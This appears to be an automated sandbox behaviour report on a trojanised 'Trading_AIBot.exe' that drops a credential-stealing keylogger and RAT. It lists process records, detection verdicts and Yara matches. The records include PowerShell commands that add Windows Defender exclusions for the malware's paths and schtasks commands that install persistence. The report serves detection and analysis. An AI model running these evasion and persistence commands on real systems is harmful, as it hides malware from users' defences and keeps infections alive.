                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                                                                                                                                                                                                                                                                        Imagebase:0x880000
                                                                                                                                                                                                                                                                        File size:70'656 bytes
                                                                                                                                                                                                                                                                        MD5 hash:E91A1DB64F5262A633465A0AAFF7A0B0
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                        • Detection: 92%, ReversingLabs
                                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                                                                                                        Start time:06:57:06
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\Microsofts.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\Microsofts.exe"
                                                                                                                                                                                                                                                                        Imagebase:0x1270000
                                                                                                                                                                                                                                                                        File size:98'816 bytes
                                                                                                                                                                                                                                                                        MD5 hash:F6B8018A27BCDBAA35778849B586D31B
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.643206935.0000000002791000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000E.00000000.376399398.0000000001272000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000000.376399398.0000000001272000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000000.376399398.0000000001272000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000E.00000000.376399398.0000000001272000.00000020.00000001.01000000.0000000C.sdmp, Author: unknown
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: unknown
                                                                                                                                                                                                                                                                        • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Florian Roth
                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                        • Detection: 91%, ReversingLabs
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:15
                                                                                                                                                                                                                                                                        Start time:06:57:07
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                        Imagebase:0x100000000
                                                                                                                                                                                                                                                                        File size:1'208'832 bytes
                                                                                                                                                                                                                                                                        MD5 hash:194D43897AB889D24B26961F99059037
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:16
                                                                                                                                                                                                                                                                        Start time:06:57:09
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                                                                                                                                                                                                                                                                        Imagebase:0xcd0000
                                                                                                                                                                                                                                                                        File size:427'008 bytes
                                                                                                                                                                                                                                                                        MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:17
                                                                                                                                                                                                                                                                        Start time:06:57:11
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 07:02 /du 23:59 /sc daily /ri 1 /f
                                                                                                                                                                                                                                                                        Imagebase:0x6a0000
                                                                                                                                                                                                                                                                        File size:179'712 bytes
                                                                                                                                                                                                                                                                        MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:20
                                                                                                                                                                                                                                                                        Start time:06:57:13
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
                                                                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                                                                        File size:1'168'896 bytes
                                                                                                                                                                                                                                                                        MD5 hash:E77E152A4018445F2DBB4277C818FAEC
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:22
                                                                                                                                                                                                                                                                        Start time:06:57:21
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
                                                                                                                                                                                                                                                                        Imagebase:0xcd0000
                                                                                                                                                                                                                                                                        File size:427'008 bytes
                                                                                                                                                                                                                                                                        MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:27
                                                                                                                                                                                                                                                                        Start time:06:57:30
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
                                                                                                                                                                                                                                                                        Imagebase:0xcd0000
                                                                                                                                                                                                                                                                        File size:427'008 bytes
                                                                                                                                                                                                                                                                        MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:29
                                                                                                                                                                                                                                                                        Start time:06:57:24
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Windows\ehome\ehrecvr.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\ehome\ehRecvr.exe
                                                                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                                                                        File size:1'276'416 bytes
                                                                                                                                                                                                                                                                        MD5 hash:045A70B9D4D84B036CE87DE912F44EAD
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:30
                                                                                                                                                                                                                                                                        Start time:06:57:26
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Windows\ehome\ehsched.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\ehome\ehsched.exe
                                                                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                                                                        File size:1'256'960 bytes
                                                                                                                                                                                                                                                                        MD5 hash:0D46082BE032D7DA3EE657EA6CE0C32D
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:31
                                                                                                                                                                                                                                                                        Start time:06:57:28
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\FXSSVC.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\fxssvc.exe
                                                                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                                                                        File size:1'269'760 bytes
                                                                                                                                                                                                                                                                        MD5 hash:5F010917F62C2D56F7B242050E3524D7
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:32
                                                                                                                                                                                                                                                                        Start time:06:57:29
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\ieetwcollector.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\IEEtwCollector.exe /V
                                                                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                                                                        File size:1'244'160 bytes
                                                                                                                                                                                                                                                                        MD5 hash:BF5F5556930D8CEF7BBAC46115910CF1
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:34
                                                                                                                                                                                                                                                                        Start time:06:57:32
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hVVSnrrP" /XML "C:\Users\user\AppData\Local\Temp\tmp2972.tmp"
                                                                                                                                                                                                                                                                        Imagebase:0x690000
                                                                                                                                                                                                                                                                        File size:179'712 bytes
                                                                                                                                                                                                                                                                        MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:35
                                                                                                                                                                                                                                                                        Start time:06:57:31
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        File size:1'293'312 bytes
                                                                                                                                                                                                                                                                        MD5 hash:5834C05D84CD41A0A0D4619A6C0CB933
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:37
                                                                                                                                                                                                                                                                        Start time:06:57:43
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\hVVSnrrP.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
                                                                                                                                                                                                                                                                        Imagebase:0x230000
                                                                                                                                                                                                                                                                        File size:1'538'560 bytes
                                                                                                                                                                                                                                                                        MD5 hash:AC9D898648D7B851BBCCB6F6028D45C6
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:38
                                                                                                                                                                                                                                                                        Start time:06:57:34
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\msdtc.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\msdtc.exe
                                                                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                                                                        File size:1'271'296 bytes
                                                                                                                                                                                                                                                                        MD5 hash:48149FCDFB3E1B695AD17C25A00F9901
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:39
                                                                                                                                                                                                                                                                        Start time:06:57:35
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                        Imagebase:0x100000000
                                                                                                                                                                                                                                                                        File size:1'256'960 bytes
                                                                                                                                                                                                                                                                        MD5 hash:0B127B7A1AB570F72488585B52FA0F77
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:41
                                                                                                                                                                                                                                                                        Start time:06:57:38
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\perfhost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWow64\perfhost.exe
                                                                                                                                                                                                                                                                        Imagebase:0x1000000
                                                                                                                                                                                                                                                                        File size:1'150'464 bytes
                                                                                                                                                                                                                                                                        MD5 hash:11D691ADAD67DBAC861DB2471CE9028B
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:42
                                                                                                                                                                                                                                                                        Start time:06:57:38
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\Locator.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\locator.exe
                                                                                                                                                                                                                                                                        Imagebase:0x100000000
                                                                                                                                                                                                                                                                        File size:1'140'224 bytes
                                                                                                                                                                                                                                                                        MD5 hash:860030B06B83DAD907D4E0801AB228F9
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:43
                                                                                                                                                                                                                                                                        Start time:06:57:39
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\snmptrap.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\snmptrap.exe
                                                                                                                                                                                                                                                                        Imagebase:0x100000000
                                                                                                                                                                                                                                                                        File size:1'144'320 bytes
                                                                                                                                                                                                                                                                        MD5 hash:BD9A4418F0BB9873B642B4914A4BCFC8
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:46
                                                                                                                                                                                                                                                                        Start time:06:58:00
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
                                                                                                                                                                                                                                                                        Imagebase:0x970000
                                                                                                                                                                                                                                                                        File size:665'670'656 bytes
                                                                                                                                                                                                                                                                        MD5 hash:46981F20592CA1EB36C2C21E396551EC
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:47
                                                                                                                                                                                                                                                                        Start time:06:57:50
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\hVVSnrrP.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
                                                                                                                                                                                                                                                                        Imagebase:0x230000
                                                                                                                                                                                                                                                                        File size:1'538'560 bytes
                                                                                                                                                                                                                                                                        MD5 hash:AC9D898648D7B851BBCCB6F6028D45C6
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:48
                                                                                                                                                                                                                                                                        Start time:06:57:44
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\vds.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\vds.exe
                                                                                                                                                                                                                                                                        Imagebase:0x100000000
                                                                                                                                                                                                                                                                        File size:1'660'928 bytes
                                                                                                                                                                                                                                                                        MD5 hash:39BE2351CC35C279474F5941C10A602A
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:50
                                                                                                                                                                                                                                                                        Start time:06:58:04
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\hVVSnrrP.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
                                                                                                                                                                                                                                                                        Imagebase:0x230000
                                                                                                                                                                                                                                                                        File size:1'538'560 bytes
                                                                                                                                                                                                                                                                        MD5 hash:AC9D898648D7B851BBCCB6F6028D45C6
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:51
                                                                                                                                                                                                                                                                        Start time:06:57:56
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\wbengine.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Windows\system32\wbengine.exe"
                                                                                                                                                                                                                                                                        Imagebase:0x100000000
                                                                                                                                                                                                                                                                        File size:2'083'328 bytes
                                                                                                                                                                                                                                                                        MD5 hash:FCD24DD63126C9B5BC420BF92FA39456
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:53
                                                                                                                                                                                                                                                                        Start time:06:58:13
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\hVVSnrrP.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
                                                                                                                                                                                                                                                                        Imagebase:0x230000
                                                                                                                                                                                                                                                                        File size:1'538'560 bytes
                                                                                                                                                                                                                                                                        MD5 hash:AC9D898648D7B851BBCCB6F6028D45C6
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                                                                        No disassembly